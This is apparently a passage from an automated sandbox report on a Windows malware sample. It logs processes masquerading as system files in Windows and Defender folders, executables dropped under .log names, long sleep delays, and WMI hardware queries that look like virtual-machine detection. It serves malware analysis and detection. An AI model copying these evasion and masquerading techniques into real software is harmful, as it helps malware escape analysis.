                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 595672
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 595522
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 595019
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 594640
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 594500
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 594285
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 594171
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 593954
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 593844
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 593732
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 593583
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 593349
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 592866
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 592698
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 592506
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 592166
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591905
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591779
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591664
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591562
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591453
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591269
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591156
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591046
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590937
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590823
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590718
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590597
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590459
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590343
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590209Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590093Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 589984Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 589841Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Window / User API: threadDelayed 4066
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Window / User API: threadDelayed 5633
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NPGqEfku.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RbOZahUq.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tWJuefum.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rAXMkKSS.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SYphwgjk.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lyXnXruh.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uUlCzfJh.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rMnteNPl.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MgNITBew.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WPgYDdje.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HkLrMVoC.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UAeHorhP.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wySLBGmi.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hdUdukKE.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dVPxoyeA.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ADqcsYvZ.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MoHhbGed.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\quZEfXkb.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CNYkWNAB.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wNAllcuf.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YALoKruW.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HtvJqEPI.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oPsvdwHZ.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hREwAhMk.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OquQxqjY.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eJTFZLay.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CFoRreZv.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GmHIOoGs.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bCyXfazS.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xbtTyUdE.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DldKqVbv.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fxzonGoL.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yKbtGcJa.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KInsUcJl.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PFcqhLrW.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZeYGhBeG.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\klRmPCEz.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qmplAoJV.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 2256Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -598985s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7572Thread sleep time: -14400000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597688s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597530s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597406s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7572Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597078s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596953s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596836s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596672s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596532s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596391s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596266s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596028s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595813s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595672s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595522s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -595019s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594640s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594285s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -594171s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593954s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593844s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593732s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593583s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -593349s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592866s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592698s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592506s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -592166s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591905s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591779s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591664s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591562s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591453s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591269s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591156s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -591046s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590937s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590823s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590718s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590597s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590459s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590343s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590209s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -590093s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -589984s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -589841s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7296Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 7300Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 7312Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe TID: 7404Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 8168Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 3228Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 5496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 3868Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 5252Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe TID: 2656Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe TID: 4208Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe TID: 1852Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 3600000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597406Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596953Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596836Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596532Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596028Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595672Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595522Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595019Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594285Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594171Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593954Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593732Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593583Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593349Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592866Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592698Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592506Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592166Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591905Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591779Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591664
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591562
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591453
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591269
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591156
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 591046
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590937
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590823
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590718
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590597
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590459
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590343
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590209
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 590093
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 589984
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 589841
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File opened: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File opened: C:\Users\user\AppData\Local
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1735897086.000000001B025000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\LC
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1750078986.000000001BE03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\|
                    Source: services.exe, 00000010.00000002.3020526244.000000001CE1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
